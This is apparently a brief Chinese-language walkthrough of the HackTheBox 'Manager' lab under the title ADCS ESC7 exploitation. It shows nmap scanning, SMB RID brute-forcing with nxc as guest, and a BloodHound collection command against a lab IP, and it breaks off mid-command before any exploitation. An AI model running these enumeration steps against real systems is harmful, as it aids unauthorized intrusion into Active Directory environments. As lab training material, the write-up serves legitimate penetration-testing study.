CPTS-Manager ADCS ESC7利用端口扫描 nmap -A -p- -n -Pn -T4 10.10.11.236枚举smb共享 尝试rid爆破 nxc smb 10.10.11.236 -u ‘guest’ -p ‘’ --rid-brute --smb-timeout 10000 经过文本处理 可以得到用户名列表 验证有效用户名 首字母小写 得到凭证 bloodhound信息收集 bloodhound-python --dns-tcp -ns 10.10.11.236 -d ‘manager.htb’ -u ‘operator’ -p